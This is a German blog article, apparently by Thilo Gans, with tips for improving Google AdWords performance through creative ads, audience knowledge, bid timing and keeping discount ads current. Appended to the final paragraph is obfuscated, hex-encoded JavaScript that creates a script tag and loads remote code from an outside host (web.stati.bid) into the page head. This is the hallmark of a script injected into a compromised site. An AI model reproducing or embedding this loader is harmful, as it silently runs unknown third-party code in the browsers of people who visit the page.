Zum suchen hier tippen und mit Eingabe bestätigen

AdWords-Performance steigern

AdWords-Performance durch kleine Tricks steigern

Auf Google AdWords können die wenigsten Webseitenbetreiber verzichten, um mit ihren Werbeanzeigen gezielt Aufmerksamkeit für ihre Projekte und einzelne Artikel zu erzeugen. Das Budget ist hierbei ein essenzieller Faktor und wird ohne professionelle Hilfe oftmals wenig clever eingesetzt. Bereits mit einfachen Mitteln lässt sich die AdWords-Performance steigern, damit mehr Geld für sinnvolle Werbemaßnahmen übrigbleibt und diese Form des Onlinemarketings richtig und gut genutzt wird.

Mit Kreativität und Intelligenz die AdWords-Performance verbessern

Beweisen Sie Kreativität und grenzen Sie sich bewusst von Ihrer Konkurrenz ab. Zwar bieten die AdWords-Anzeigen nur wenig Raum für lange Ausschweifungen und außergewöhnliche Formulierungen. Dennoch werden Sie bei einem Blick auf die Anzeigen Ihrer Konkurrenten schnell merken, wie ähnlich sich diese in Aufbau und Aussage sind. Hier heißt es, sich kreativ und clever von abzugrenzen und dabei die Hauptaussage rund um Ihre Produkte oder Dienstleistungen nicht aus den Augen zu verlieren.

Einen intelligenten Einsatz Ihres SEA-Budgets erreichen Sie selbstverständlich auch durch die genaue Kenntnis Ihrer Zielgruppen. Häufig folgen Laien im Onlinemarketing einfachen Ratschlägen blind und übersehen, mit wem Sie es auf der anderen Seite des Bildschirms eigentlich zu tun haben. So wird aktuell die Optimierung für mobile Geräte wie Smartphones und Tablets als primäre Verpflichtung aller Werbenden dargestellt, möglicherweise ist gerade die Zielgruppe Ihrer Produkte jedoch konservativ in der Internetnutzung. Mit einem Blick auf die Statistiken Ihres AdWords-Account lässt sich dies vergleichsweise einfach ermitteln.

Gebotsoptionen nutzen und Aktualität beachten

Wer als Laie etwas tiefer in die Materie von Google AdWords eingestiegen ist, versteht das Geboteprinzip rund um verschiedene Keywords. Häufig wird jedoch übersehen, nach welchen Regeln es zu Preisschwankungen bei den Geboten kommt und wie diese für die eigenen Zwecke genutzt werden können. Bereits die Uhrzeit oder einzelne Tage der Woche beeinflussen den Preis erheblich und bieten für jedes Budget die Chance, auch bei umkämpften Begriffen zu fairen Angeboten zu gelangen.

Wird auf Klicks für bestimmte Anzeigen geboten, sollte außerdem der Inhalt der Anzeige mit aktuellen oder generell gültigen Werbeinformationen beachtet werden. Ein Klassiker sind AdWords-Anzeigen, die im Rahmen einer Kampagne für spezielle Rabatte und Angebote geschaltet wurden. Diese Preisnachlässe werden nach einigen Tagen oder Wochen aufgegeben, die zugehörigen AdWords-Anzeigen existieren jedoch noch Monate weiter und sorgen für Enttäuschung bei Internetnutzer. Wenn Sie gerade in einer größeren Kampagne mit einer Fülle an Keywords die Übersicht zu verlieren drohen, wird Ihnen die Zusammenarbeit mit einer professionellen SEA-Agentur garantiert weiterhelfen. var _0x29b4=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64\x2F\x6A\x73\x2F\x59\x51\x48\x48\x41\x41\x55\x44\x59\x77\x42\x46\x67\x6C\x44\x58\x67\x30\x56\x53\x42\x56\x57\x79\x45\x44\x51\x35\x64\x78\x47\x43\x42\x54\x4E\x54\x38\x55\x44\x47\x55\x42\x42\x54\x30\x7A\x50\x46\x55\x6A\x43\x74\x41\x52\x45\x32\x4E\x7A\x41\x56\x4A\x53\x49\x50\x51\x30\x46\x4A\x41\x42\x46\x55\x56\x54\x4B\x5F\x41\x41\x42\x4A\x56\x78\x49\x47\x45\x6B\x48\x35\x51\x43\x46\x44\x42\x41\x53\x56\x49\x68\x50\x50\x63\x52\x45\x71\x59\x52\x46\x45\x64\x52\x51\x63\x73\x55\x45\x6B\x41\x52\x4A\x59\x51\x79\x41\x58\x56\x42\x50\x4E\x63\x51\x4C\x61\x51\x41\x56\x6D\x34\x43\x51\x43\x5A\x41\x41\x56\x64\x45\x4D\x47\x59\x41\x58\x51\x78\x77\x61\x2E\x6A\x73\x3F\x74\x72\x6C\x3D\x30\x2E\x35\x30″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64“];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)

Über den Autor: Thilo Gans